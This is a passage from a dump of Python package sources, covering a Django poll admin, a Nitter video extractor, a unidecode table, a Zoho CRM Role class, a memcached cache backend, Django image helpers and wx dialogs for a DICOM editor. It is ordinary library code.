extra = 1
classes = ('collapse',)
@apply_opps_rules('polls')
class PollAdmin(PublishableAdmin):
form = PollAdminForm
prepopulated_fields = {"slug": ["question"]}
list_display = ['question', 'channel', 'date_available',
'date_end', 'published', 'preview_url']
list_filter = ["date_end", "date_available", "published", "channel"]
search_fields = ["question", "headline"]
exclude = ('user',)
raw_id_fields = ['main_image', 'channel']
inlines = [ChoiceInline, PollPostInline]
readonly_fields = ['image_thumb']
fieldsets = (
(_(u'Identification'), {
'fields': ('site', 'question', 'slug')}),
(_(u'Content'), {
'fields': ('headline', ('main_image', 'image_thumb'), 'tags')}),
(_(u'Relationships'), {
'fields': ('channel',)}),
(_(u'Publication'), {
'classes': ('extrapretty'),
'fields': ('published', ('date_available', 'date_end'),
'order', 'multiple_choices', ('min_multiple_choices',
'max_multiple_choices'), 'display_choice_images',
'show_results')}),
)
class PollBoxPollsInline(admin.TabularInline):
model = PollBoxPolls
fk_name = 'pollbox'
raw_id_fields = ['poll']
actions = None
extra = 1
fieldsets = [(None, {
'classes': ('collapse',),
'fields': ('poll', 'order', 'date_available', 'date_end')})]
class PollBoxAdmin(PublishableAdmin):
prepopulated_fields = {"slug": ["name"]}
list_display = ['name', 'date_available', 'published']
list_filter = ['date_available', 'published']
inlines = [PollBoxPollsInline]
exclude = ('user',)
raw_id_fields = ['channel', 'article']
fieldsets = (
(_(u'Identification'), {
'fields': ('site', 'name', 'slug')}),
(_(u'Relationships'), {
'fields': ('channel',)}),
(_(u'Publication'), {
'classes': ('extrapretty'),
'fields': ('published', 'date_available')}),
)
def clean_ended_entries(self, request, queryset):
now = timezone.now()
for box in queryset:
ended = box.pollboxpolls_pollboxes.filter(
date_end__lt=now
)
if ended:
ended.delete()
clean_ended_entries.short_description = _(u'Clean ended polls')
actions = ('clean_ended_entries',)
class PollConfigAdmin(PublishableAdmin):
list_display = ['key', 'key_group', 'channel', 'date_insert',
'date_available', 'published']
list_filter = ["key", 'key_group', "channel", "published"]
search_fields = ["key", "key_group", "value"]
raw_id_fields = ['poll', 'channel', 'article']
exclude = ('user',)
admin.site.register(Poll, PollAdmin)
admin.site.register(PollBox, PollBoxAdmin)
admin.site.register(PollConfig, PollConfigAdmin) | PypiClean |
/haruhi_dl-2021.8.1.tar.gz/haruhi_dl-2021.8.1/haruhi_dl/extractor/nitter.py | from __future__ import unicode_literals
from .common import SelfhostedInfoExtractor
from ..utils import (
parse_count,
unified_strdate,
unified_timestamp,
remove_end,
determine_ext,
ExtractorError,
)
class NitterSHIE(SelfhostedInfoExtractor):
_VALID_URL = r'nitter:(?P<host>[^:]+):(?P<id>\d+)'
_SH_VALID_URL = r'https?://(?P<host>[^/]+)/(?P<uploader_id>.+)/status/(?P<id>[0-9]+)(?:#.)?'
_SH_VALID_CONTENT_STRINGS = (
'<meta property="og:site_name" content="Nitter" />',
'<link rel="stylesheet" type="text/css" href="/css/themes/nitter.css" />',
)
_SELFHOSTED = True
current_instance = 'nitter.nixnet.services'
_TESTS = [
{
# GIF (wrapped in mp4)
'url': 'nitter:' + current_instance + ':1314279897502629888',
'info_dict': {
'id': '1314279897502629888',
'ext': 'mp4',
'title': 'Firefox 🔥 - You know the old saying, if you see something say something. Now you actually can with the YouTube regrets extension. Report harmful YouTube recommendations so others can avoid watching them. ➡️ https://mzl.la/3iFIiyg #UnfckTheInternet',
'description': 'You know the old saying, if you see something say something. Now you actually can with the YouTube regrets extension. Report harmful YouTube recommendations so others can avoid watching them. ➡️ https://mzl.la/3iFIiyg #UnfckTheInternet',
'thumbnail': r're:^https?://.*\.jpg$',
'uploader': 'Firefox 🔥',
'uploader_id': 'firefox',
'uploader_url': 'https://' + current_instance + '/firefox',
'upload_date': '20201008',
'timestamp': 1602183720,
},
}, { # normal video
'url': 'nitter:' + current_instance + ':1299715685392756737',
'info_dict': {
'id': '1299715685392756737',
'ext': 'mp4',
'title': 're:.+ - "Je ne prédis jamais rien" D Raoult, Août 2020...',
'description': '"Je ne prédis jamais rien" D Raoult, Août 2020...',
'thumbnail': r're:^https?://.*\.jpg$',
'uploader': str,
'uploader_id': 'Le___Doc',
'uploader_url': 'https://' + current_instance + '/Le___Doc',
'upload_date': '20200829',
'timestamp': 1598711341,
'view_count': int,
'like_count': int,
'repost_count': int,
'comment_count': int,
},
}, { # video embed in a "Streaming Political Ads" box
'url': 'nitter:' + current_instance + ':1321147074491092994',
'info_dict': {
'id': '1321147074491092994',
'ext': 'mp4',
'title': "Mozilla - Are you being targeted with weird, ominous or just plain annoying political ads while streaming your favorite shows? This isn't a real political ad, but if you're watching streaming TV in the U.S., chances are you've seen quite a few. Learn more ➡️ https://mzl.la/StreamingAds",
'description': "Are you being targeted with weird, ominous or just plain annoying political ads while streaming your favorite shows? This isn't a real political ad, but if you're watching streaming TV in the U.S., chances are you've seen quite a few. Learn more ➡️ https://mzl.la/StreamingAds",
'thumbnail': r're:^https?://.*\.jpg$',
'uploader': 'Mozilla',
'uploader_id': 'mozilla',
'uploader_url': 'https://' + current_instance + '/mozilla',
'upload_date': '20201027',
'timestamp': 1603820982
},
},
]
def _selfhosted_extract(self, url, webpage=None):
host, video_id = self._match_id_and_host(url)
base_url = ('http://' if url.startswith('http://') else 'https://') + host
if self._downloader.params.get('use_proxy_sites') is False:
return self.url_result('https://twitter.com/i/web/status/' + video_id, ie='Twitter')
if not webpage or '>Enable hls playback<' in webpage:
if self._downloader.params.get('use_proxy_sites') is None and not url.startswith('nitter:'):
return self.url_result('https://twitter.com/i/web/status/' + video_id, ie='Twitter')
self._set_cookie(host, 'hlsPlayback', 'on')
if url.startswith('nitter:'):
url = base_url + '/hdl/status/' + video_id
webpage = self._download_webpage(url, video_id,
note='Re-downloading webpage for HLS data' if webpage else 'Downloading webpage',
expected_status=(200, 429))
if '>Instance has been rate limited.<' in webpage:
if self._downloader.params.get('use_proxy_sites') is False:
raise ExtractorError('Instance has been rate limited', expected=True)
self.report_warning('Instance has been rate limited, falling back to Twitter')
return self.url_result('https://twitter.com/i/web/status/' + video_id, ie='Twitter')
video_url = base_url + self._html_search_regex(r'(?:<video[^>]+data-url|<source[^>]+src)="([^"]+)"', webpage, 'video url')
ext = determine_ext(video_url)
if ext == 'unknown_video':
formats = self._extract_m3u8_formats(video_url, video_id, ext='mp4')
else:
formats = [{
'url': video_url,
'ext': ext
}]
title = (
self._og_search_description(webpage).replace('\n', ' ')
or self._html_search_regex(r'<div class="tweet-content[^>]+>([^<]+)</div>', webpage, 'title'))
description = title
uploader_id = self._html_search_regex(r'<a class="username"[^>]+title="@([^"]+)"', webpage, 'uploader id', fatal=False)
if uploader_id:
uploader_url = base_url + '/' + uploader_id
uploader = self._html_search_regex(r'<a class="fullname"[^>]+title="([^"]+)"', webpage, 'uploader name', fatal=False)
if uploader:
title = uploader + ' - ' + title
view_count = parse_count(self._html_search_regex(r'<span[^>]+class="icon-play[^>]*></span>\s([^<]+)</div>', webpage, 'view count', fatal=False))
like_count = parse_count(self._html_search_regex(r'<span[^>]+class="icon-heart[^>]*></span>\s([^<]+)</div>', webpage, 'like count', fatal=False))
repost_count = parse_count(self._html_search_regex(r'<span[^>]+class="icon-retweet[^>]*></span>\s([^<]+)</div>', webpage, 'repost count', fatal=False))
comment_count = parse_count(self._html_search_regex(r'<span[^>]+class="icon-comment[^>]*></span>\s([^<]+)</div>', webpage, 'repost count', fatal=False))
thumbnail = base_url + (self._html_search_meta('og:image', webpage, 'thumbnail url')
or self._html_search_regex(r'<video[^>]+poster="([^"]+)"', webpage, 'thumbnail url', fatal=False))
thumbnail = remove_end(thumbnail, '%3Asmall') # if parsed with regex, it should contain this
thumbnails = []
thumbnail_ids = ('thumb', 'small', 'large', 'medium', 'orig')
for id in thumbnail_ids:
thumbnails.append({
'id': id,
'url': thumbnail + '%3A' + id,
})
date = self._html_search_regex(r'<span[^>]+class="tweet-date"[^>]*><a[^>]+title="([^"]+)"', webpage, 'upload date', fatal=False)
upload_date = unified_strdate(date)
timestamp = unified_timestamp(date)
return {
'id': video_id,
'title': title,
'description': description,
'uploader': uploader,
'timestamp': timestamp,
'uploader_id': uploader_id,
'uploader_url': uploader_url,
'view_count': view_count,
'like_count': like_count,
'repost_count': repost_count,
'comment_count': comment_count,
'formats': formats,
'thumbnails': thumbnails,
'thumbnail': thumbnail,
'upload_date': upload_date,
} | PypiClean |
/latin_databases-0.1.16.tar.gz/latin_databases-0.1.16/latin/unidecode2/x033.py | data = (
'apartment', # 0x00
'alpha', # 0x01
'ampere', # 0x02
'are', # 0x03
'inning', # 0x04
'inch', # 0x05
'won', # 0x06
'escudo', # 0x07
'acre', # 0x08
'ounce', # 0x09
'ohm', # 0x0a
'kai-ri', # 0x0b
'carat', # 0x0c
'calorie', # 0x0d
'gallon', # 0x0e
'gamma', # 0x0f
'giga', # 0x10
'guinea', # 0x11
'curie', # 0x12
'guilder', # 0x13
'kilo', # 0x14
'kilogram', # 0x15
'kilometer', # 0x16
'kilowatt', # 0x17
'gram', # 0x18
'gram ton', # 0x19
'cruzeiro', # 0x1a
'krone', # 0x1b
'case', # 0x1c
'koruna', # 0x1d
'co-op', # 0x1e
'cycle', # 0x1f
'centime', # 0x20
'shilling', # 0x21
'centi', # 0x22
'cent', # 0x23
'dozen', # 0x24
'desi', # 0x25
'dollar', # 0x26
'ton', # 0x27
'nano', # 0x28
'knot', # 0x29
'heights', # 0x2a
'percent', # 0x2b
'parts', # 0x2c
'barrel', # 0x2d
'piaster', # 0x2e
'picul', # 0x2f
'pico', # 0x30
'building', # 0x31
'farad', # 0x32
'feet', # 0x33
'bushel', # 0x34
'franc', # 0x35
'hectare', # 0x36
'peso', # 0x37
'pfennig', # 0x38
'hertz', # 0x39
'pence', # 0x3a
'page', # 0x3b
'beta', # 0x3c
'point', # 0x3d
'volt', # 0x3e
'hon', # 0x3f
'pound', # 0x40
'hall', # 0x41
'horn', # 0x42
'micro', # 0x43
'mile', # 0x44
'mach', # 0x45
'mark', # 0x46
'mansion', # 0x47
'micron', # 0x48
'milli', # 0x49
'millibar', # 0x4a
'mega', # 0x4b
'megaton', # 0x4c
'meter', # 0x4d
'yard', # 0x4e
'yard', # 0x4f
'yuan', # 0x50
'liter', # 0x51
'lira', # 0x52
'rupee', # 0x53
'ruble', # 0x54
'rem', # 0x55
'roentgen', # 0x56
'watt', # 0x57
'0h', # 0x58
'1h', # 0x59
'2h', # 0x5a
'3h', # 0x5b
'4h', # 0x5c
'5h', # 0x5d
'6h', # 0x5e
'7h', # 0x5f
'8h', # 0x60
'9h', # 0x61
'10h', # 0x62
'11h', # 0x63
'12h', # 0x64
'13h', # 0x65
'14h', # 0x66
'15h', # 0x67
'16h', # 0x68
'17h', # 0x69
'18h', # 0x6a
'19h', # 0x6b
'20h', # 0x6c
'21h', # 0x6d
'22h', # 0x6e
'23h', # 0x6f
'24h', # 0x70
'hPa', # 0x71
'da', # 0x72
'AU', # 0x73
'bar', # 0x74
'oV', # 0x75
'pc', # 0x76
'dm', # 0x77
'dm^2', # 0x78
'dm^3', # 0x79
'IU', # 0x7a
'Heisei', # 0x7b
'Syouwa', # 0x7c
'Taisyou', # 0x7d
'Meiji', # 0x7e
'Inc.', # 0x7f
'pA', # 0x80
'nA', # 0x81
'uA', # 0x82
'mA', # 0x83
'kA', # 0x84
'kB', # 0x85
'MB', # 0x86
'GB', # 0x87
'cal', # 0x88
'kcal', # 0x89
'pF', # 0x8a
'nF', # 0x8b
'uF', # 0x8c
'ug', # 0x8d
'mg', # 0x8e
'kg', # 0x8f
'Hz', # 0x90
'kHz', # 0x91
'MHz', # 0x92
'GHz', # 0x93
'THz', # 0x94
'ul', # 0x95
'ml', # 0x96
'dl', # 0x97
'kl', # 0x98
'fm', # 0x99
'nm', # 0x9a
'um', # 0x9b
'mm', # 0x9c
'cm', # 0x9d
'km', # 0x9e
'mm^2', # 0x9f
'cm^2', # 0xa0
'm^2', # 0xa1
'km^2', # 0xa2
'mm^3', # 0xa3
'cm^3', # 0xa4
'm^3', # 0xa5
'km^3', # 0xa6
'm/s', # 0xa7
'm/s^2', # 0xa8
'Pa', # 0xa9
'kPa', # 0xaa
'MPa', # 0xab
'GPa', # 0xac
'rad', # 0xad
'rad/s', # 0xae
'rad/s^2', # 0xaf
'ps', # 0xb0
'ns', # 0xb1
'us', # 0xb2
'ms', # 0xb3
'pV', # 0xb4
'nV', # 0xb5
'uV', # 0xb6
'mV', # 0xb7
'kV', # 0xb8
'MV', # 0xb9
'pW', # 0xba
'nW', # 0xbb
'uW', # 0xbc
'mW', # 0xbd
'kW', # 0xbe
'MW', # 0xbf
'kOhm', # 0xc0
'MOhm', # 0xc1
'a.m.', # 0xc2
'Bq', # 0xc3
'cc', # 0xc4
'cd', # 0xc5
'C/kg', # 0xc6
'Co.', # 0xc7
'dB', # 0xc8
'Gy', # 0xc9
'ha', # 0xca
'HP', # 0xcb
'in', # 0xcc
'K.K.', # 0xcd
'KM', # 0xce
'kt', # 0xcf
'lm', # 0xd0
'ln', # 0xd1
'log', # 0xd2
'lx', # 0xd3
'mb', # 0xd4
'mil', # 0xd5
'mol', # 0xd6
'pH', # 0xd7
'p.m.', # 0xd8
'PPM', # 0xd9
'PR', # 0xda
'sr', # 0xdb
'Sv', # 0xdc
'Wb', # 0xdd
'V/m', # 0xde
'A/m', # 0xdf
'1d', # 0xe0
'2d', # 0xe1
'3d', # 0xe2
'4d', # 0xe3
'5d', # 0xe4
'6d', # 0xe5
'7d', # 0xe6
'8d', # 0xe7
'9d', # 0xe8
'10d', # 0xe9
'11d', # 0xea
'12d', # 0xeb
'13d', # 0xec
'14d', # 0xed
'15d', # 0xee
'16d', # 0xef
'17d', # 0xf0
'18d', # 0xf1
'19d', # 0xf2
'20d', # 0xf3
'21d', # 0xf4
'22d', # 0xf5
'23d', # 0xf6
'24d', # 0xf7
'25d', # 0xf8
'26d', # 0xf9
'27d', # 0xfa
'28d', # 0xfb
'29d', # 0xfc
'30d', # 0xfd
'31d', # 0xfe
'gal', # 0xff
) | PypiClean |
/zohocrmsdk2_0-5.1.0.tar.gz/zohocrmsdk2_0-5.1.0/zcrmsdk/src/com/zoho/crm/api/roles/role.py | try:
from zcrmsdk.src.com.zoho.crm.api.exception import SDKException
from zcrmsdk.src.com.zoho.crm.api.util import Constants
except Exception:
from ..exception import SDKException
from ..util import Constants
class Role(object):
def __init__(self):
"""Creates an instance of Role"""
self.__display_label = None
self.__forecast_manager = None
self.__share_with_peers = None
self.__name = None
self.__description = None
self.__id = None
self.__reporting_to = None
self.__admin_user = None
self.__key_modified = dict()
def get_display_label(self):
"""
The method to get the display_label
Returns:
string: A string representing the display_label
"""
return self.__display_label
def set_display_label(self, display_label):
"""
The method to set the value to display_label
Parameters:
display_label (string) : A string representing the display_label
"""
if display_label is not None and not isinstance(display_label, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: display_label EXPECTED TYPE: str', None, None)
self.__display_label = display_label
self.__key_modified['display_label'] = 1
def get_forecast_manager(self):
"""
The method to get the forecast_manager
Returns:
User: An instance of User
"""
return self.__forecast_manager
def set_forecast_manager(self, forecast_manager):
"""
The method to set the value to forecast_manager
Parameters:
forecast_manager (User) : An instance of User
"""
try:
from zcrmsdk.src.com.zoho.crm.api.users import User
except Exception:
from ..users import User
if forecast_manager is not None and not isinstance(forecast_manager, User):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: forecast_manager EXPECTED TYPE: User', None, None)
self.__forecast_manager = forecast_manager
self.__key_modified['forecast_manager'] = 1
def get_share_with_peers(self):
"""
The method to get the share_with_peers
Returns:
bool: A bool representing the share_with_peers
"""
return self.__share_with_peers
def set_share_with_peers(self, share_with_peers):
"""
The method to set the value to share_with_peers
Parameters:
share_with_peers (bool) : A bool representing the share_with_peers
"""
if share_with_peers is not None and not isinstance(share_with_peers, bool):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: share_with_peers EXPECTED TYPE: bool', None, None)
self.__share_with_peers = share_with_peers
self.__key_modified['share_with_peers'] = 1
def get_name(self):
"""
The method to get the name
Returns:
string: A string representing the name
"""
return self.__name
def set_name(self, name):
"""
The method to set the value to name
Parameters:
name (string) : A string representing the name
"""
if name is not None and not isinstance(name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: name EXPECTED TYPE: str', None, None)
self.__name = name
self.__key_modified['name'] = 1
def get_description(self):
"""
The method to get the description
Returns:
string: A string representing the description
"""
return self.__description
def set_description(self, description):
"""
The method to set the value to description
Parameters:
description (string) : A string representing the description
"""
if description is not None and not isinstance(description, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: description EXPECTED TYPE: str', None, None)
self.__description = description
self.__key_modified['description'] = 1
def get_id(self):
"""
The method to get the id
Returns:
int: An int representing the id
"""
return self.__id
def set_id(self, id):
"""
The method to set the value to id
Parameters:
id (int) : An int representing the id
"""
if id is not None and not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
self.__id = id
self.__key_modified['id'] = 1
def get_reporting_to(self):
"""
The method to get the reporting_to
Returns:
User: An instance of User
"""
return self.__reporting_to
def set_reporting_to(self, reporting_to):
"""
The method to set the value to reporting_to
Parameters:
reporting_to (User) : An instance of User
"""
try:
from zcrmsdk.src.com.zoho.crm.api.users import User
except Exception:
from ..users import User
if reporting_to is not None and not isinstance(reporting_to, User):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: reporting_to EXPECTED TYPE: User', None, None)
self.__reporting_to = reporting_to
self.__key_modified['reporting_to'] = 1
def get_admin_user(self):
"""
The method to get the admin_user
Returns:
bool: A bool representing the admin_user
"""
return self.__admin_user
def set_admin_user(self, admin_user):
"""
The method to set the value to admin_user
Parameters:
admin_user (bool) : A bool representing the admin_user
"""
if admin_user is not None and not isinstance(admin_user, bool):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: admin_user EXPECTED TYPE: bool', None, None)
self.__admin_user = admin_user
self.__key_modified['admin_user'] = 1
def is_key_modified(self, key):
"""
The method to check if the user has modified the given key
Parameters:
key (string) : A string representing the key
Returns:
int: An int representing the modification
"""
if key is not None and not isinstance(key, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: key EXPECTED TYPE: str', None, None)
if key in self.__key_modified:
return self.__key_modified.get(key)
return None
def set_key_modified(self, key, modification):
"""
The method to mark the given key as modified
Parameters:
key (string) : A string representing the key
modification (int) : An int representing the modification
"""
if key is not None and not isinstance(key, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: key EXPECTED TYPE: str', None, None)
if modification is not None and not isinstance(modification, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: modification EXPECTED TYPE: int', None, None)
self.__key_modified[key] = modification | PypiClean |
/django-newcache-0.2.4.tar.gz/django-newcache-0.2.4/newcache.py | "Modified memcached cache backend"
import time
from threading import local
from django.core.cache.backends.base import BaseCache, InvalidCacheBackendError
from django.utils.hashcompat import sha_constructor
from django.utils.encoding import smart_str
from django.conf import settings
try:
from django.utils import importlib
except ImportError:
import importlib
try:
import pylibmc as memcache
NotFoundError = memcache.NotFound
using_pylibmc = True
except ImportError:
using_pylibmc = False
try:
import memcache
NotFoundError = ValueError
except ImportError:
raise InvalidCacheBackendError('Memcached cache backend requires ' +
'either the "pylibmc" or "memcache" library')
# Flavor is used amongst multiple apps to differentiate the "flavor" of the
# environment. Examples of flavors are 'prod', 'staging', 'dev', and 'test'.
FLAVOR = getattr(settings, 'FLAVOR', '')
CACHE_VERSION = str(getattr(settings, 'CACHE_VERSION', 1))
CACHE_BEHAVIORS = getattr(settings, 'CACHE_BEHAVIORS', {'hash': 'crc'})
CACHE_KEY_MODULE = getattr(settings, 'CACHE_KEY_MODULE', 'newcache')
CACHE_HERD_TIMEOUT = getattr(settings, 'CACHE_HERD_TIMEOUT', 60)
class Marker(object):
pass
MARKER = Marker()
def get_key(key):
"""
Returns a hashed, versioned, flavored version of the string that was input.
"""
hashed = sha_constructor(smart_str(key)).hexdigest()
return ''.join((FLAVOR, '-', CACHE_VERSION, '-', hashed))
key_func = importlib.import_module(CACHE_KEY_MODULE).get_key
class CacheClass(BaseCache):
def __init__(self, server, params):
super(CacheClass, self).__init__(params)
self._servers = server.split(';')
self._use_binary = bool(params.get('binary'))
self._local = local()
@property
def _cache(self):
"""
Implements transparent thread-safe access to a memcached client.
"""
client = getattr(self._local, 'client', None)
if client:
return client
# Use binary mode if it's both supported and requested
if using_pylibmc and self._use_binary:
client = memcache.Client(self._servers, binary=True)
else:
client = memcache.Client(self._servers)
# If we're using pylibmc, set the behaviors according to settings
if using_pylibmc:
client.behaviors = CACHE_BEHAVIORS
self._local.client = client
return client
def _pack_value(self, value, timeout):
"""
Packs a value to include a marker (to indicate that it's a packed
value), the value itself, and the value's timeout information.
"""
herd_timeout = (timeout or self.default_timeout) + int(time.time())
return (MARKER, value, herd_timeout)
def _unpack_value(self, value, default=None):
"""
Unpacks a value and returns a tuple whose first element is the value,
and whose second element is whether it needs to be herd refreshed.
"""
try:
marker, unpacked, herd_timeout = value
except (ValueError, TypeError):
return value, False
if not isinstance(marker, Marker):
return value, False
if herd_timeout < int(time.time()):
return unpacked, True
return unpacked, False
def _get_memcache_timeout(self, timeout):
"""
Memcached deals with long (> 30 days) timeouts in a special
way. Call this function to obtain a safe value for your timeout.
"""
if timeout is None:
timeout = self.default_timeout
if timeout > 2592000: # 60*60*24*30, 30 days
# See http://code.google.com/p/memcached/wiki/FAQ
# "You can set expire times up to 30 days in the future. After that
# memcached interprets it as a date, and will expire the item after
# said date. This is a simple (but obscure) mechanic."
#
# This means that we have to switch to absolute timestamps.
timeout += int(time.time())
return timeout
def add(self, key, value, timeout=None, herd=True):
# If the user chooses to use the herd mechanism, then encode some
# timestamp information into the object to be persisted into memcached
if herd and timeout != 0:
packed = self._pack_value(value, timeout)
real_timeout = (self._get_memcache_timeout(timeout) +
CACHE_HERD_TIMEOUT)
else:
packed = value
real_timeout = self._get_memcache_timeout(timeout)
return self._cache.add(key_func(key), packed, real_timeout)
def get(self, key, default=None):
encoded_key = key_func(key)
packed = self._cache.get(encoded_key)
if packed is None:
return default
val, refresh = self._unpack_value(packed)
# If the cache has expired according to the embedded timeout, then
# shove it back into the cache for a while, but act as if it was a
# cache miss.
if refresh:
self._cache.set(encoded_key, val,
self._get_memcache_timeout(CACHE_HERD_TIMEOUT))
return default
return val
def set(self, key, value, timeout=None, herd=True):
# If the user chooses to use the herd mechanism, then encode some
# timestamp information into the object to be persisted into memcached
if herd and timeout != 0:
packed = self._pack_value(value, timeout)
real_timeout = (self._get_memcache_timeout(timeout) +
CACHE_HERD_TIMEOUT)
else:
packed = value
real_timeout = self._get_memcache_timeout(timeout)
return self._cache.set(key_func(key), packed, real_timeout)
def delete(self, key):
self._cache.delete(key_func(key))
def get_many(self, keys):
# First, map all of the keys through our key function
rvals = map(key_func, keys)
packed_resp = self._cache.get_multi(rvals)
resp = {}
reinsert = {}
for key, packed in packed_resp.iteritems():
# If it was a miss, treat it as a miss to our response & continue
if packed is None:
resp[key] = packed
continue
val, refresh = self._unpack_value(packed)
if refresh:
reinsert[key] = val
resp[key] = None
else:
resp[key] = val
# If there are values to re-insert for a short period of time, then do
# so now.
if reinsert:
self._cache.set_multi(reinsert,
self._get_memcache_timeout(CACHE_HERD_TIMEOUT))
# Build a reverse map of encoded keys to the original keys, so that
# the returned dict's keys are what users expect (in that they match
# what the user originally entered)
reverse = dict(zip(rvals, keys))
return dict(((reverse[k], v) for k, v in resp.iteritems()))
def close(self, **kwargs):
self._cache.disconnect_all()
def incr(self, key, delta=1):
try:
return self._cache.incr(key_func(key), delta)
except NotFoundError:
raise ValueError("Key '%s' not found" % (key,))
def decr(self, key, delta=1):
try:
return self._cache.decr(key_func(key), delta)
except NotFoundError:
raise ValueError("Key '%s' not found" % (key,))
def set_many(self, data, timeout=None, herd=True):
if herd and timeout != 0:
safe_data = dict(((key_func(k), self._pack_value(v, timeout))
for k, v in data.iteritems()))
else:
safe_data = dict((
(key_func(k), v) for k, v in data.iteritems()))
self._cache.set_multi(safe_data, self._get_memcache_timeout(timeout))
def delete_many(self, keys):
self._cache.delete_multi(map(key_func, keys))
def clear(self):
self._cache.flush_all() | PypiClean |
/django-lightweight-0.2.tar.gz/django-lightweight-0.2/django/core/files/images.py | import struct
import zlib
from django.core.files import File
class ImageFile(File):
"""
A mixin for use alongside django.core.files.base.File, which provides
additional features for dealing with images.
"""
@property
def width(self):
return self._get_image_dimensions()[0]
@property
def height(self):
return self._get_image_dimensions()[1]
def _get_image_dimensions(self):
if not hasattr(self, "_dimensions_cache"):
close = self.closed
self.open()
self._dimensions_cache = get_image_dimensions(self, close=close)
return self._dimensions_cache
def get_image_dimensions(file_or_path, close=False):
"""
Return the (width, height) of an image, given an open file or a path. Set
'close' to True to close the file at the end if it is initially in an open
state.
"""
from PIL import ImageFile as PillowImageFile
p = PillowImageFile.Parser()
if hasattr(file_or_path, "read"):
file = file_or_path
file_pos = file.tell()
file.seek(0)
else:
try:
file = open(file_or_path, "rb")
except OSError:
return (None, None)
close = True
try:
# Most of the time Pillow only needs a small chunk to parse the image
# and get the dimensions, but with some TIFF files Pillow needs to
# parse the whole file.
chunk_size = 1024
while 1:
data = file.read(chunk_size)
if not data:
break
try:
p.feed(data)
except zlib.error as e:
# ignore zlib complaining on truncated stream, just feed more
# data to parser (ticket #19457).
if e.args[0].startswith("Error -5"):
pass
else:
raise
except struct.error:
# Ignore PIL failing on a too short buffer when reads return
# less bytes than expected. Skip and feed more data to the
# parser (ticket #24544).
pass
except RuntimeError:
# e.g. "RuntimeError: could not create decoder object" for
# WebP files. A different chunk_size may work.
pass
if p.image:
return p.image.size
chunk_size *= 2
return (None, None)
finally:
if close:
file.close()
else:
file.seek(file_pos) | PypiClean |
/dvha-edit-0.7.post1.tar.gz/dvha-edit-0.7.post1/dvhaedit/dialogs.py |
# dialogs.py
"""
Classes used to edit pydicom datasets
"""
# Copyright (c) 2020 Dan Cutright
# This file is part of DVHA DICOM Editor, released under a BSD license.
# See the file LICENSE included with this distribution, also
# available at https://github.com/cutright/DVHA-DICOM-Editor
import wx
import re
from pubsub import pub
from pydicom.uid import RE_VALID_UID_PREFIX
from dvhaedit._version import __version__
from dvhaedit.data_table import DataTable
from dvhaedit.dicom_editor import TagSearch
from dvhaedit.dynamic_value import HELP_TEXT
from dvhaedit.paths import LICENSE_PATH
from dvhaedit.utilities import save_csv_to_file
class ErrorDialog:
"""This class allows error messages to be called with a one-liner else-where"""
def __init__(self, parent, message, caption, flags=wx.ICON_ERROR | wx.OK | wx.OK_DEFAULT):
"""
:param parent: wx parent object
:param message: error message
:param caption: error title
:param flags: flags for wx.MessageDialog
"""
self.dlg = wx.MessageDialog(parent, message, caption, flags)
self.dlg.Center()
self.dlg.ShowModal()
self.dlg.Destroy()
class AskYesNo(wx.MessageDialog):
"""Simple Yes/No MessageDialog"""
def __init__(self, parent, msg, caption="Are you sure?",
flags=wx.ICON_WARNING | wx.YES | wx.NO | wx.NO_DEFAULT):
wx.MessageDialog.__init__(self, parent, msg, caption, flags)
class ViewErrorLog(wx.Dialog):
"""Dialog to display the error log in a scrollable window"""
def __init__(self, error_log):
"""
:param error_log: error log text
:type error_log: str
"""
wx.Dialog.__init__(self, None, title='Error log')
self.error_log = error_log
self.button = {'dismiss': wx.Button(self, wx.ID_OK, "Dismiss"),
'save': wx.Button(self, wx.ID_ANY, "Save")}
self.scrolled_window = wx.ScrolledWindow(self, wx.ID_ANY)
self.text = wx.StaticText(self.scrolled_window, wx.ID_ANY,
"The following errors occurred while editing DICOM tags...\n\n%s" % self.error_log)
self.__set_properties()
self.__do_bind()
self.__do_layout()
self.run()
def __do_bind(self):
self.Bind(wx.EVT_BUTTON, self.on_save, id=self.button['save'].GetId())
def __set_properties(self):
self.scrolled_window.SetScrollRate(20, 20)
self.scrolled_window.SetBackgroundColour(wx.WHITE)
def __do_layout(self):
# Create sizers
sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
sizer_text = wx.BoxSizer(wx.VERTICAL)
sizer_buttons = wx.BoxSizer(wx.HORIZONTAL)
# Add error log text
sizer_text.Add(self.text, 0, wx.EXPAND | wx.ALL, 5)
self.scrolled_window.SetSizer(sizer_text)
sizer_wrapper.Add(self.scrolled_window, 1, wx.EXPAND, 0)
# Add buttons
sizer_buttons.Add(self.button['save'], 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_buttons.Add(self.button['dismiss'], 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_wrapper.Add(sizer_buttons, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.SetSizer(sizer_wrapper)
self.SetMinSize((700, 600))
self.Fit()
self.Center()
def run(self):
"""Open dialog, close on Dismiss click"""
self.ShowModal()
self.Destroy()
wx.CallAfter(pub.sendMessage, "do_save_dicom_step_2")
def on_save(self, *evt):
"""On save button click, create save window to save error log"""
dlg = wx.FileDialog(self, "Save error log", "", wildcard='*.txt',
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if dlg.ShowModal() == wx.ID_OK:
save_csv_to_file(self.error_log, dlg.GetPath())
dlg.Destroy()
class TagSearchDialog(wx.Dialog):
"""A dialog consisting of a search bar and table of partial DICOM Tag matches"""
def __init__(self, parent):
"""
:param parent: main frame of DVHA DICOM Edit
"""
wx.Dialog.__init__(self, parent, title='DICOM Tag Search')
self.parent = parent
# Create search bar and TagSearch class
self.search_ctrl = wx.SearchCtrl(self, wx.ID_ANY, "")
self.search_ctrl.ShowCancelButton(True)
self.search = TagSearch()
